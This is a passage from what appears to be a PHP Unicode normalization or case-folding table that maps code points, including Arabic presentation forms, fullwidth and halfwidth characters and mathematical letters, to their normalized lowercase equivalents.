=> 'ئې', 64503 => 'ئې', 64504 => 'ئې', 64505 => 'ئى', 64506 => 'ئى', 64507 => 'ئى', 64508 => 'ی', 64509 => 'ی', 64510 => 'ی', 64511 => 'ی', 64512 => 'ئج', 64513 => 'ئح', 64514 => 'ئم', 64515 => 'ئى', 64516 => 'ئي', 64517 => 'بج', 64518 => 'بح', 64519 => 'بخ', 64520 => 'بم', 64521 => 'بى', 64522 => 'بي', 64523 => 'تج', 64524 => 'تح', 64525 => 'تخ', 64526 => 'تم', 64527 => 'تى', 64528 => 'تي', 64529 => 'ثج', 64530 => 'ثم', 64531 => 'ثى', 64532 => 'ثي', 64533 => 'جح', 64534 => 'جم', 64535 => 'حج', 64536 => 'حم', 64537 => 'خج', 64538 => 'خح', 64539 => 'خم', 64540 => 'سج', 64541 => 'سح', 64542 => 'سخ', 64543 => 'سم', 64544 => 'صح', 64545 => 'صم', 64546 => 'ضج', 64547 => 'ضح', 64548 => 'ضخ', 64549 => 'ضم', 64550 => 'طح', 64551 => 'طم', 64552 => 'ظم', 64553 => 'عج', 64554 => 'عم', 64555 => 'غج', 64556 => 'غم', 64557 => 'فج', 64558 => 'فح', 64559 => 'فخ', 64560 => 'فم', 64561 => 'فى', 64562 => 'في', 64563 => 'قح', 64564 => 'قم', 64565 => 'قى', 64566 => 'قي', 64567 => 'كا', 64568 => 'كج', 64569 => 'كح', 64570 => 'كخ', 64571 => 'كل', 64572 => 'كم', 64573 => 'كى', 64574 => 'كي', 64575 => 'لج', 64576 => 'لح', 64577 => 'لخ', 64578 => 'لم', 64579 => 'لى', 64580 => 'لي', 64581 => 'مج', 64582 => 'مح', 64583 => 'مخ', 64584 => 'مم', 64585 => 'مى', 64586 => 'مي', 64587 => 'نج', 64588 => 'نح', 64589 => 'نخ', 64590 => 'نم', 64591 => 'نى', 64592 => 'ني', 64593 => 'هج', 64594 => 'هم', 64595 => 'هى', 64596 => 'هي', 64597 => 'يج', 64598 => 'يح', 64599 => 'يخ', 64600 => 'يم', 64601 => 'يى', 64602 => 'يي', 64603 => 'ذٰ', 64604 => 'رٰ', 64605 => 'ىٰ', 64612 => 'ئر', 64613 => 'ئز', 64614 => 'ئم', 64615 => 'ئن', 64616 => 'ئى', 64617 => 'ئي', 64618 => 'بر', 64619 => 'بز', 64620 => 'بم', 64621 => 'بن', 64622 => 'بى', 64623 => 'بي', 64624 => 'تر', 64625 => 'تز', 64626 => 'تم', 64627 => 'تن', 64628 => 'تى', 64629 => 'تي', 64630 => 'ثر', 64631 => 'ثز', 64632 => 'ثم', 64633 => 'ثن', 64634 => 'ثى', 64635 => 'ثي', 64636 => 'فى', 64637 => 'في', 64638 => 'قى', 64639 => 'قي', 64640 => 'كا', 64641 => 'كل', 64642 => 'كم', 64643 => 'كى', 64644 => 'كي', 64645 => 'لم', 64646 => 'لى', 64647 => 'لي', 64648 => 'ما', 64649 => 'مم', 64650 => 'نر', 64651 => 'نز', 64652 => 'نم', 64653 => 'نن', 64654 => 'نى', 64655 => 'ني', 64656 => 'ىٰ', 64657 => 'ير', 64658 => 'يز', 64659 => 'يم', 64660 => 'ين', 64661 => 'يى', 64662 => 'يي', 64663 => 'ئج', 64664 => 'ئح', 64665 => 'ئخ', 64666 => 'ئم', 64667 => 'ئه', 64668 => 'بج', 64669 => 'بح', 64670 => 'بخ', 64671 => 'بم', 64672 => 'به', 64673 => 'تج', 64674 => 'تح', 64675 => 'تخ', 64676 => 'تم', 64677 => 'ته', 64678 => 'ثم', 64679 => 'جح', 64680 => 'جم', 64681 => 'حج', 64682 => 'حم', 64683 => 'خج', 64684 => 'خم', 64685 => 'سج', 64686 => 'سح', 64687 => 'سخ', 64688 => 'سم', 64689 => 'صح', 64690 => 'صخ', 64691 => 'صم', 64692 => 'ضج', 64693 => 'ضح', 64694 => 'ضخ', 64695 => 'ضم', 64696 => 'طح', 64697 => 'ظم', 64698 => 'عج', 64699 => 'عم', 64700 => 'غج', 64701 => 'غم', 64702 => 'فج', 64703 => 'فح', 64704 => 'فخ', 64705 => 'فم', 64706 => 'قح', 64707 => 'قم', 64708 => 'كج', 64709 => 'كح', 64710 => 'كخ', 64711 => 'كل', 64712 => 'كم', 64713 => 'لج', 64714 => 'لح', 64715 => 'لخ', 64716 => 'لم', 64717 => 'له', 64718 => 'مج', 64719 => 'مح', 64720 => 'مخ', 64721 => 'مم', 64722 => 'نج', 64723 => 'نح', 64724 => 'نخ', 64725 => 'نم', 64726 => 'نه', 64727 => 'هج', 64728 => 'هم', 64729 => 'هٰ', 64730 => 'يج', 64731 => 'يح', 64732 => 'يخ', 64733 => 'يم', 64734 => 'يه', 64735 => 'ئم', 64736 => 'ئه', 64737 => 'بم', 64738 => 'به', 64739 => 'تم', 64740 => 'ته', 64741 => 'ثم', 64742 => 'ثه', 64743 => 'سم', 64744 => 'سه', 64745 => 'شم', 64746 => 'شه', 64747 => 'كل', 64748 => 'كم', 64749 => 'لم', 64750 => 'نم', 64751 => 'نه', 64752 => 'يم', 64753 => 'يه', 64754 => 'ـَّ', 64755 => 'ـُّ', 64756 => 'ـِّ', 64757 => 'طى', 64758 => 'طي', 64759 => 'عى', 64760 => 'عي', 64761 => 'غى', 64762 => 'غي', 64763 => 'سى', 64764 => 'سي', 64765 => 'شى', 64766 => 'شي', 64767 => 'حى', 64768 => 'حي', 64769 => 'جى', 64770 => 'جي', 64771 => 'خى', 64772 => 'خي', 64773 => 'صى', 64774 => 'صي', 64775 => 'ضى', 64776 => 'ضي', 64777 => 'شج', 64778 => 'شح', 64779 => 'شخ', 64780 => 'شم', 64781 => 'شر', 64782 => 'سر', 64783 => 'صر', 64784 => 'ضر', 64785 => 'طى', 64786 => 'طي', 64787 => 'عى', 64788 => 'عي', 64789 => 'غى', 64790 => 'غي', 64791 => 'سى', 64792 => 'سي', 64793 => 'شى', 64794 => 'شي', 64795 => 'حى', 64796 => 'حي', 64797 => 'جى', 64798 => 'جي', 64799 => 'خى', 64800 => 'خي', 64801 => 'صى', 64802 => 'صي', 64803 => 'ضى', 64804 => 'ضي', 64805 => 'شج', 64806 => 'شح', 64807 => 'شخ', 64808 => 'شم', 64809 => 'شر', 64810 => 'سر', 64811 => 'صر', 64812 => 'ضر', 64813 => 'شج', 64814 => 'شح', 64815 => 'شخ', 64816 => 'شم', 64817 => 'سه', 64818 => 'شه', 64819 => 'طم', 64820 => 'سج', 64821 => 'سح', 64822 => 'سخ', 64823 => 'شج', 64824 => 'شح', 64825 => 'شخ', 64826 => 'طم', 64827 => 'ظم', 64828 => 'اً', 64829 => 'اً', 64848 => 'تجم', 64849 => 'تحج', 64850 => 'تحج', 64851 => 'تحم', 64852 => 'تخم', 64853 => 'تمج', 64854 => 'تمح', 64855 => 'تمخ', 64856 => 'جمح', 64857 => 'جمح', 64858 => 'حمي', 64859 => 'حمى', 64860 => 'سحج', 64861 => 'سجح', 64862 => 'سجى', 64863 => 'سمح', 64864 => 'سمح', 64865 => 'سمج', 64866 => 'سمم', 64867 => 'سمم', 64868 => 'صحح', 64869 => 'صحح', 64870 => 'صمم', 64871 => 'شحم', 64872 => 'شحم', 64873 => 'شجي', 64874 => 'شمخ', 64875 => 'شمخ', 64876 => 'شمم', 64877 => 'شمم', 64878 => 'ضحى', 64879 => 'ضخم', 64880 => 'ضخم', 64881 => 'طمح', 64882 => 'طمح', 64883 => 'طمم', 64884 => 'طمي', 64885 => 'عجم', 64886 => 'عمم', 64887 => 'عمم', 64888 => 'عمى', 64889 => 'غمم', 64890 => 'غمي', 64891 => 'غمى', 64892 => 'فخم', 64893 => 'فخم', 64894 => 'قمح', 64895 => 'قمم', 64896 => 'لحم', 64897 => 'لحي', 64898 => 'لحى', 64899 => 'لجج', 64900 => 'لجج', 64901 => 'لخم', 64902 => 'لخم', 64903 => 'لمح', 64904 => 'لمح', 64905 => 'محج', 64906 => 'محم', 64907 => 'محي', 64908 => 'مجح', 64909 => 'مجم', 64910 => 'مخج', 64911 => 'مخم', 64914 => 'مجخ', 64915 => 'همج', 64916 => 'همم', 64917 => 'نحم', 64918 => 'نحى', 64919 => 'نجم', 64920 => 'نجم', 64921 => 'نجى', 64922 => 'نمي', 64923 => 'نمى', 64924 => 'يمم', 64925 => 'يمم', 64926 => 'بخي', 64927 => 'تجي', 64928 => 'تجى', 64929 => 'تخي', 64930 => 'تخى', 64931 => 'تمي', 64932 => 'تمى', 64933 => 'جمي', 64934 => 'جحى', 64935 => 'جمى', 64936 => 'سخى', 64937 => 'صحي', 64938 => 'شحي', 64939 => 'ضحي', 64940 => 'لجي', 64941 => 'لمي', 64942 => 'يحي', 64943 => 'يجي', 64944 => 'يمي', 64945 => 'ممي', 64946 => 'قمي', 64947 => 'نحي', 64948 => 'قمح', 64949 => 'لحم', 64950 => 'عمي', 64951 => 'كمي', 64952 => 'نجح', 64953 => 'مخي', 64954 => 'لجم', 64955 => 'كمم', 64956 => 'لجم', 64957 => 'نجح', 64958 => 'جحي', 64959 => 'حجي', 64960 => 'مجي', 64961 => 'فمي', 64962 => 'بحي', 64963 => 'كمم', 64964 => 'عجم', 64965 => 'صمم', 64966 => 'سخي', 64967 => 'نجي', 65008 => 'صلے', 65009 => 'قلے', 65010 => 'الله', 65011 => 'اكبر', 65012 => 'محمد', 65013 => 'صلعم', 65014 => 'رسول', 65015 => 'عليه', 65016 => 'وسلم', 65017 => 'صلى', 65020 => 'ریال', 65041 => '、', 65047 => '〖', 65048 => '〗', 65073 => '—', 65074 => '–', 65081 => '〔', 65082 => '〕', 65083 => '【', 65084 => '】', 65085 => '《', 65086 => '》', 65087 => '〈', 65088 => '〉', 65089 => '「', 65090 => '」', 65091 => '『', 65092 => '』', 65105 => '、', 65112 => '—', 65117 => '〔', 65118 => '〕', 65123 => '-', 65137 => 'ـً', 65143 => 'ـَ', 65145 => 'ـُ', 65147 => 'ـِ', 65149 => 'ـّ', 65151 => 'ـْ', 65152 => 'ء', 65153 => 'آ', 65154 => 'آ', 65155 => 'أ', 65156 => 'أ', 65157 => 'ؤ', 65158 => 'ؤ', 65159 => 'إ', 65160 => 'إ', 65161 => 'ئ', 65162 => 'ئ', 65163 => 'ئ', 65164 => 'ئ', 65165 => 'ا', 65166 => 'ا', 65167 => 'ب', 65168 => 'ب', 65169 => 'ب', 65170 => 'ب', 65171 => 'ة', 65172 => 'ة', 65173 => 'ت', 65174 => 'ت', 65175 => 'ت', 65176 => 'ت', 65177 => 'ث', 65178 => 'ث', 65179 => 'ث', 65180 => 'ث', 65181 => 'ج', 65182 => 'ج', 65183 => 'ج', 65184 => 'ج', 65185 => 'ح', 65186 => 'ح', 65187 => 'ح', 65188 => 'ح', 65189 => 'خ', 65190 => 'خ', 65191 => 'خ', 65192 => 'خ', 65193 => 'د', 65194 => 'د', 65195 => 'ذ', 65196 => 'ذ', 65197 => 'ر', 65198 => 'ر', 65199 => 'ز', 65200 => 'ز', 65201 => 'س', 65202 => 'س', 65203 => 'س', 65204 => 'س', 65205 => 'ش', 65206 => 'ش', 65207 => 'ش', 65208 => 'ش', 65209 => 'ص', 65210 => 'ص', 65211 => 'ص', 65212 => 'ص', 65213 => 'ض', 65214 => 'ض', 65215 => 'ض', 65216 => 'ض', 65217 => 'ط', 65218 => 'ط', 65219 => 'ط', 65220 => 'ط', 65221 => 'ظ', 65222 => 'ظ', 65223 => 'ظ', 65224 => 'ظ', 65225 => 'ع', 65226 => 'ع', 65227 => 'ع', 65228 => 'ع', 65229 => 'غ', 65230 => 'غ', 65231 => 'غ', 65232 => 'غ', 65233 => 'ف', 65234 => 'ف', 65235 => 'ف', 65236 => 'ف', 65237 => 'ق', 65238 => 'ق', 65239 => 'ق', 65240 => 'ق', 65241 => 'ك', 65242 => 'ك', 65243 => 'ك', 65244 => 'ك', 65245 => 'ل', 65246 => 'ل', 65247 => 'ل', 65248 => 'ل', 65249 => 'م', 65250 => 'م', 65251 => 'م', 65252 => 'م', 65253 => 'ن', 65254 => 'ن', 65255 => 'ن', 65256 => 'ن', 65257 => 'ه', 65258 => 'ه', 65259 => 'ه', 65260 => 'ه', 65261 => 'و', 65262 => 'و', 65263 => 'ى', 65264 => 'ى', 65265 => 'ي', 65266 => 'ي', 65267 => 'ي', 65268 => 'ي', 65269 => 'لآ', 65270 => 'لآ', 65271 => 'لأ', 65272 => 'لأ', 65273 => 'لإ', 65274 => 'لإ', 65275 => 'لا', 65276 => 'لا', 65293 => '-', 65294 => '.', 65296 => '0', 65297 => '1', 65298 => '2', 65299 => '3', 65300 => '4', 65301 => '5', 65302 => '6', 65303 => '7', 65304 => '8', 65305 => '9', 65313 => 'a', 65314 => 'b', 65315 => 'c', 65316 => 'd', 65317 => 'e', 65318 => 'f', 65319 => 'g', 65320 => 'h', 65321 => 'i', 65322 => 'j', 65323 => 'k', 65324 => 'l', 65325 => 'm', 65326 => 'n', 65327 => 'o', 65328 => 'p', 65329 => 'q', 65330 => 'r', 65331 => 's', 65332 => 't', 65333 => 'u', 65334 => 'v', 65335 => 'w', 65336 => 'x', 65337 => 'y', 65338 => 'z', 65345 => 'a', 65346 => 'b', 65347 => 'c', 65348 => 'd', 65349 => 'e', 65350 => 'f', 65351 => 'g', 65352 => 'h', 65353 => 'i', 65354 => 'j', 65355 => 'k', 65356 => 'l', 65357 => 'm', 65358 => 'n', 65359 => 'o', 65360 => 'p', 65361 => 'q', 65362 => 'r', 65363 => 's', 65364 => 't', 65365 => 'u', 65366 => 'v', 65367 => 'w', 65368 => 'x', 65369 => 'y', 65370 => 'z', 65375 => '⦅', 65376 => '⦆', 65377 => '.', 65378 => '「', 65379 => '」', 65380 => '、', 65381 => '・', 65382 => 'ヲ', 65383 => 'ァ', 65384 => 'ィ', 65385 => 'ゥ', 65386 => 'ェ', 65387 => 'ォ', 65388 => 'ャ', 65389 => 'ュ', 65390 => 'ョ', 65391 => 'ッ', 65392 => 'ー', 65393 => 'ア', 65394 => 'イ', 65395 => 'ウ', 65396 => 'エ', 65397 => 'オ', 65398 => 'カ', 65399 => 'キ', 65400 => 'ク', 65401 => 'ケ', 65402 => 'コ', 65403 => 'サ', 65404 => 'シ', 65405 => 'ス', 65406 => 'セ', 65407 => 'ソ', 65408 => 'タ', 65409 => 'チ', 65410 => 'ツ', 65411 => 'テ', 65412 => 'ト', 65413 => 'ナ', 65414 => 'ニ', 65415 => 'ヌ', 65416 => 'ネ', 65417 => 'ノ', 65418 => 'ハ', 65419 => 'ヒ', 65420 => 'フ', 65421 => 'ヘ', 65422 => 'ホ', 65423 => 'マ', 65424 => 'ミ', 65425 => 'ム', 65426 => 'メ', 65427 => 'モ', 65428 => 'ヤ', 65429 => 'ユ', 65430 => 'ヨ', 65431 => 'ラ', 65432 => 'リ', 65433 => 'ル', 65434 => 'レ', 65435 => 'ロ', 65436 => 'ワ', 65437 => 'ン', 65438 => '゙', 65439 => '゚', 65441 => 'ᄀ', 65442 => 'ᄁ', 65443 => 'ᆪ', 65444 => 'ᄂ', 65445 => 'ᆬ', 65446 => 'ᆭ', 65447 => 'ᄃ', 65448 => 'ᄄ', 65449 => 'ᄅ', 65450 => 'ᆰ', 65451 => 'ᆱ', 65452 => 'ᆲ', 65453 => 'ᆳ', 65454 => 'ᆴ', 65455 => 'ᆵ', 65456 => 'ᄚ', 65457 => 'ᄆ', 65458 => 'ᄇ', 65459 => 'ᄈ', 65460 => 'ᄡ', 65461 => 'ᄉ', 65462 => 'ᄊ', 65463 => 'ᄋ', 65464 => 'ᄌ', 65465 => 'ᄍ', 65466 => 'ᄎ', 65467 => 'ᄏ', 65468 => 'ᄐ', 65469 => 'ᄑ', 65470 => 'ᄒ', 65474 => 'ᅡ', 65475 => 'ᅢ', 65476 => 'ᅣ', 65477 => 'ᅤ', 65478 => 'ᅥ', 65479 => 'ᅦ', 65482 => 'ᅧ', 65483 => 'ᅨ', 65484 => 'ᅩ', 65485 => 'ᅪ', 65486 => 'ᅫ', 65487 => 'ᅬ', 65490 => 'ᅭ', 65491 => 'ᅮ', 65492 => 'ᅯ', 65493 => 'ᅰ', 65494 => 'ᅱ', 65495 => 'ᅲ', 65498 => 'ᅳ', 65499 => 'ᅴ', 65500 => 'ᅵ', 65504 => '¢', 65505 => '£', 65506 => '¬', 65508 => '¦', 65509 => '¥', 65510 => '₩', 65512 => '│', 65513 => '←', 65514 => '↑', 65515 => '→', 65516 => '↓', 65517 => '■', 65518 => '○', 66560 => '𐐨', 66561 => '𐐩', 66562 => '𐐪', 66563 => '𐐫', 66564 => '𐐬', 66565 => '𐐭', 66566 => '𐐮', 66567 => '𐐯', 66568 => '𐐰', 66569 => '𐐱', 66570 => '𐐲', 66571 => '𐐳', 66572 => '𐐴', 66573 => '𐐵', 66574 => '𐐶', 66575 => '𐐷', 66576 => '𐐸', 66577 => '𐐹', 66578 => '𐐺', 66579 => '𐐻', 66580 => '𐐼', 66581 => '𐐽', 66582 => '𐐾', 66583 => '𐐿', 66584 => '𐑀', 66585 => '𐑁', 66586 => '𐑂', 66587 => '𐑃', 66588 => '𐑄', 66589 => '𐑅', 66590 => '𐑆', 66591 => '𐑇', 66592 => '𐑈', 66593 => '𐑉', 66594 => '𐑊', 66595 => '𐑋', 66596 => '𐑌', 66597 => '𐑍', 66598 => '𐑎', 66599 => '𐑏', 66736 => '𐓘', 66737 => '𐓙', 66738 => '𐓚', 66739 => '𐓛', 66740 => '𐓜', 66741 => '𐓝', 66742 => '𐓞', 66743 => '𐓟', 66744 => '𐓠', 66745 => '𐓡', 66746 => '𐓢', 66747 => '𐓣', 66748 => '𐓤', 66749 => '𐓥', 66750 => '𐓦', 66751 => '𐓧', 66752 => '𐓨', 66753 => '𐓩', 66754 => '𐓪', 66755 => '𐓫', 66756 => '𐓬', 66757 => '𐓭', 66758 => '𐓮', 66759 => '𐓯', 66760 => '𐓰', 66761 => '𐓱', 66762 => '𐓲', 66763 => '𐓳', 66764 => '𐓴', 66765 => '𐓵', 66766 => '𐓶', 66767 => '𐓷', 66768 => '𐓸', 66769 => '𐓹', 66770 => '𐓺', 66771 => '𐓻', 68736 => '𐳀', 68737 => '𐳁', 68738 => '𐳂', 68739 => '𐳃', 68740 => '𐳄', 68741 => '𐳅', 68742 => '𐳆', 68743 => '𐳇', 68744 => '𐳈', 68745 => '𐳉', 68746 => '𐳊', 68747 => '𐳋', 68748 => '𐳌', 68749 => '𐳍', 68750 => '𐳎', 68751 => '𐳏', 68752 => '𐳐', 68753 => '𐳑', 68754 => '𐳒', 68755 => '𐳓', 68756 => '𐳔', 68757 => '𐳕', 68758 => '𐳖', 68759 => '𐳗', 68760 => '𐳘', 68761 => '𐳙', 68762 => '𐳚', 68763 => '𐳛', 68764 => '𐳜', 68765 => '𐳝', 68766 => '𐳞', 68767 => '𐳟', 68768 => '𐳠', 68769 => '𐳡', 68770 => '𐳢', 68771 => '𐳣', 68772 => '𐳤', 68773 => '𐳥', 68774 => '𐳦', 68775 => '𐳧', 68776 => '𐳨', 68777 => '𐳩', 68778 => '𐳪', 68779 => '𐳫', 68780 => '𐳬', 68781 => '𐳭', 68782 => '𐳮', 68783 => '𐳯', 68784 => '𐳰', 68785 => '𐳱', 68786 => '𐳲', 71840 => '𑣀', 71841 => '𑣁', 71842 => '𑣂', 71843 => '𑣃', 71844 => '𑣄', 71845 => '𑣅', 71846 => '𑣆', 71847 => '𑣇', 71848 => '𑣈', 71849 => '𑣉', 71850 => '𑣊', 71851 => '𑣋', 71852 => '𑣌', 71853 => '𑣍', 71854 => '𑣎', 71855 => '𑣏', 71856 => '𑣐', 71857 => '𑣑', 71858 => '𑣒', 71859 => '𑣓', 71860 => '𑣔', 71861 => '𑣕', 71862 => '𑣖', 71863 => '𑣗', 71864 => '𑣘', 71865 => '𑣙', 71866 => '𑣚', 71867 => '𑣛', 71868 => '𑣜', 71869 => '𑣝', 71870 => '𑣞', 71871 => '𑣟', 93760 => '𖹠', 93761 => '𖹡', 93762 => '𖹢', 93763 => '𖹣', 93764 => '𖹤', 93765 => '𖹥', 93766 => '𖹦', 93767 => '𖹧', 93768 => '𖹨', 93769 => '𖹩', 93770 => '𖹪', 93771 => '𖹫', 93772 => '𖹬', 93773 => '𖹭', 93774 => '𖹮', 93775 => '𖹯', 93776 => '𖹰', 93777 => '𖹱', 93778 => '𖹲', 93779 => '𖹳', 93780 => '𖹴', 93781 => '𖹵', 93782 => '𖹶', 93783 => '𖹷', 93784 => '𖹸', 93785 => '𖹹', 93786 => '𖹺', 93787 => '𖹻', 93788 => '𖹼', 93789 => '𖹽', 93790 => '𖹾', 93791 => '𖹿', 119134 => '𝅗𝅥', 119135 => '𝅘𝅥', 119136 => '𝅘𝅥𝅮', 119137 => '𝅘𝅥𝅯', 119138 => '𝅘𝅥𝅰', 119139 => '𝅘𝅥𝅱', 119140 => '𝅘𝅥𝅲', 119227 => '𝆹𝅥', 119228 => '𝆺𝅥', 119229 => '𝆹𝅥𝅮', 119230 => '𝆺𝅥𝅮', 119231 => '𝆹𝅥𝅯', 119232 => '𝆺𝅥𝅯', 119808 => 'a', 119809 => 'b', 119810 => 'c', 119811 => 'd', 119812 => 'e', 119813 => 'f', 119814 => 'g', 119815 => 'h', 119816 => 'i', 119817 => 'j', 119818 => 'k', 119819 => 'l', 119820 => 'm', 119821 => 'n', 119822 => 'o', 119823 => 'p', 119824 => 'q', 119825 => 'r', 119826 => 's', 119827 => 't', 119828 => 'u', 119829 => 'v', 119830 => 'w', 119831 => 'x', 119832 => 'y', 119833 => 'z', 119834 => 'a', 119835 => 'b', 119836 => 'c', 119837 => 'd', 119838 => 'e', 119839 => 'f', 119840 => 'g', 119841 => 'h', 119842 => 'i', 119843 => 'j', 119844 => 'k', 119845 => 'l', 119846 => 'm', 119847 => 'n', 119848 => 'o', 119849 => 'p', 119850 => 'q', 119851 => 'r', 119852 => 's', 119853 => 't', 119854 => 'u', 119855 => 'v', 119856 => 'w', 119857 => 'x', 119858 => 'y', 119859 => 'z', 119860 => 'a', 119861 => 'b', 119862 => 'c', 119863 => 'd', 119864 => 'e', 119865 => 'f', 119866 => 'g', 119867 => 'h', 119868 => 'i', 119869 => 'j', 119870 => 'k', 119871 => 'l', 119872 => 'm', 119873 => 'n', 119874 => 'o', 119875 => 'p', 119876 => 'q', 119877 => 'r', 119878 => 's', 119879 => 't', 119880 => 'u', 119881 => 'v', 119882 => 'w', 119883 => 'x', 119884 => 'y', 119885 => 'z', 119886 => 'a', 119887 => 'b', 119888 => 'c', 119889 => 'd', 119890 => 'e', 119891 => 'f', 119892 => 'g', 119894 => 'i', 119895 => 'j', 119896 => 'k', 119897 => 'l', 119898 => 'm', 119899 => 'n', 119900 => 'o', 119901 => 'p', 119902 => 'q', 119903 => 'r', 119904 => 's', 119905 => 't', 119906 => 'u', 119907 => 'v', 119908 => 'w', 119909 => 'x', 119910 => 'y', 119911 => 'z', 119912 => 'a', 119913 => 'b', 119914 => 'c', 119915 => 'd', 119916 => 'e', 119917 => 'f', 119918 => 'g', 119919 => 'h', 119920 => 'i', 119921 => 'j', 119922 => 'k', 119923 => 'l', 119924 => 'm', 119925 => 'n', 119926 => 'o', 119927 => 'p', 119928 => 'q', 119929 => 'r', 119930 => 's', 119931 => 't', 119932 => 'u', 119933 => 'v', 119934 => 'w', 119935 => 'x', 119936 => 'y', 119937 => 'z', 119938 => 'a', 119939 => 'b', 119940 => 'c', 119941 => 'd', 119942 => 'e', 119943 => 'f', 119944 => 'g', 119945 => 'h', 119946 => 'i', 119947 => 'j', 119948 => 'k', 119949 => 'l', 119950 => 'm', 119951 => 'n', 119952 => 'o', 119953 => 'p', 119954 => 'q', 119955 => 'r', 119956 => 's', 119957 => 't', 119958 => 'u', 119959 => 'v', 119960 => 'w', 119961 => 'x', 119962 => 'y', 119963 => 'z', 119964 => 'a', 119966 => 'c', 119967 => 'd', 119970 => 'g', 119973 => 'j', 119974 => 'k', 119977 => 'n', 119978 => 'o', 119979 => 'p', 119980 => 'q', 119982 => 's', 119983 => 't', 119984 => 'u', 119985 => 'v', 119986 => 'w', 119987 => 'x', 119988 => 'y', 119989 => 'z', 119990 => 'a', 119991 => 'b', 119992 => 'c', 119993 => 'd', 119995 => 'f', 119997 => 'h', 119998 => 'i', 119999 => 'j', 120000 => 'k', 120001 => 'l', 120002 => 'm', 120003 => 'n', 120005 => 'p', 120006 => 'q', 120007 => 'r', 120008 => 's', 120009 => 't', 120010 => 'u', 120011 => 'v', 120012 => 'w', 120013 => 'x', 120014 => 'y', 120015 => 'z', 120016 => 'a', 120017 => 'b', 120018 => 'c', 120019 => 'd', 120020 => 'e', 120021 => 'f', 120022 => 'g', 120023 => 'h', 120024 => 'i', 120025 => 'j', 120026 => 'k', 120027 => 'l', 120028 => 'm', 120029 => 'n', 120030 => 'o', 120031 => 'p', 120032 => 'q', 120033 => 'r', 120034 => 's', 120035 => 't', 120036 => 'u', 120037 => 'v', 120038 => 'w', 120039 => 'x', 120040 => 'y', 120041 => 'z', 120042 => 'a', 120043 => 'b', 120044 => 'c', 120045 => 'd', 120046 => 'e', 120047 => 'f', 120048 => 'g', 120049 => 'h', 120050 => 'i', 120051 => 'j', 120052 => 'k', 120053 => 'l', 120054 => 'm', 120055 => 'n', 120056 => 'o', 120057 => 'p', 120058 => 'q', 120059 => 'r', 120060 => 's', 120061 => 't', 120062 => 'u', 120063 => 'v', 120064 => 'w', 120065 => 'x', 120066 => 'y', 120067 => 'z', 120068 => 'a', 120069 => 'b', 120071 => 'd', 120072 => 'e', 120073 => 'f', 120074 => 'g', 120077 => 'j', 120078 => 'k', 120079 => 'l', 120080 => 'm', 120081 => 'n', 120082 => 'o', 120083 => 'p', 120084 => 'q', 120086 => 's', 120087 => 't', 120088 => 'u', 120089 => 'v', 120090 => 'w', 120091 => 'x', 120092 => 'y', 120094 => 'a', 120095 => 'b', 120096 => 'c', 120097 => 'd', 120098 => 'e', 120099 => 'f', 120100 => 'g', 120101 => 'h', 120102 => 'i', 120103 => 'j', 120104 => 'k', 120105 => 'l', 120106 => 'm', 120107 => 'n', 120108 => 'o', 120109 => 'p', 120110 => 'q', 120111 => 'r', 120112 => 's', 120113 => 't', 120114 => 'u', 120115 => 'v', 120116 => 'w', 120117 => 'x', 120118 => 'y', 120119 => 'z', 120120 => 'a', 120121 => 'b', 120123 => 'd', 120124 => 'e', 120125 => 'f', 120126 => 'g', 120128 => 'i', 120129 => 'j', 120130 => 'k', 120131 => 'l', 120132 => 'm', 120134 => 'o', 120138 => 's', 120139 => 't', 120140 => 'u', 120141 => 'v', 120142 => 'w', 120143 => 'x', 120144 => 'y', 120146 => 'a', 120147 => 'b', 120148 => 'c', 120149 => 'd', 120150 => 'e', 120151 => 'f', 120152 => 'g', 120153 => 'h', 120154 => 'i', 120155 => 'j', 120156 => 'k', 120157 => 'l', 120158 => 'm', 120159 => 'n', 120160 => 'o', 120161 => 'p', 120162 => 'q', 120163 => 'r', 120164 => 's', 120165 => 't', 120166 => 'u', 120167 => 'v', 120168 => 'w', 120169 => 'x', 120170 => 'y', 120171 => 'z', 120172 => 'a', 120173 => 'b', 120174 => 'c', 120175 => 'd', 120176 => 'e', 120177 => 'f', 120178 => 'g', 120179 => 'h', 120180 => 'i', 120181 => 'j', 120182 => 'k', 120183 => 'l', 120184 => 'm', 120185 => 'n', 120186 => 'o', 120187 => 'p', 120188 => 'q', 120189 => 'r', 120190 => 's', 120191 => 't', 120192 => 'u', 120193 => 'v', 120194 => 'w', 120195 => 'x', 120196 => 'y', 120197 => 'z', 120198 => 'a', 120199 => 'b', 120200 => 'c', 120201 => 'd', 120202 => 'e', 120203 => 'f', 120204 => 'g', 120205 => 'h', 120206 => 'i', 120207 => 'j', 120208 => 'k', 120209 => 'l', 120210 => 'm', 120211 => 'n', 120212 => 'o', 120213 => 'p', 120214 => 'q', 120215 => 'r', 120216 => 's', 120217 => 't', 120218 => 'u', 120219 => 'v', 120220 => 'w', 120221 => 'x', 120222 => 'y', 120223 => 'z', 120224 => 'a', 120225 => 'b', 120226 => 'c', 120227 => 'd', 120228 => 'e', 120229 => 'f', 120230 => 'g', 120231 => 'h', 120232 => 'i', 120233 => 'j', 120234 => 'k', 120235 => 'l', 120236 => 'm', 120237 => 'n', 120238 => 'o', 120239 => 'p', 120240 => 'q', 120241 => 'r', 120242 => 's', 120243 => 't', 120244 => 'u', 120245 => 'v', 120246 => 'w', 120247 => 'x', 120248 => 'y', 120249 => 'z', 120250 => 'a', 120251 => 'b', 120252 => 'c', 120253 => 'd', 120254 => 'e', 120255 => 'f', 120256 => 'g', 120257 => 'h', 120258 => 'i', 120259 => 'j', 120260 => 'k', 120261 => 'l', 120262 => 'm', 120263 => 'n', 120264 => 'o', 120265 => 'p', 120266 => 'q', 120267 => 'r', 120268 => 's', 120269 => 't', 120270 => 'u', 120271 => 'v', 120272 => 'w', 120273 => 'x', 120274 => 'y', 120275 => 'z', 120276 => 'a', 120277 => 'b', 120278 => 'c', 120279 => 'd', 120280 => 'e', 120281 => 'f', 120282 => 'g', 120283 => 'h', 120284 => 'i', 120285 => 'j', 120286 => 'k', 120287 => 'l', 120288 => 'm', 120289 => 'n', 120290 => 'o', 120291 => 'p', 120292 => 'q', 120293 => 'r', 120294 => 's', 120295 => 't', 120296 => 'u', 120297 => 'v', 120298 => 'w', 120299 => 'x', 120300 => 'y', 120301 => 'z', 120302 => 'a', 120303 => 'b', 120304 => 'c', 120305 => 'd', 120306 => 'e', 120307 => 'f', 120308 => 'g', 120309 => 'h', 120310 => 'i', 120311 => 'j', 120312 => 'k', 120313 => 'l', 120314 => 'm', 120315 => 'n', 120316 => 'o', 120317 => 'p', 120318 => 'q', 120319 => 'r', 120320 => 's', 120321 => 't', 120322 => 'u', 120323 => 'v', 120324 => 'w', 120325 => 'x', 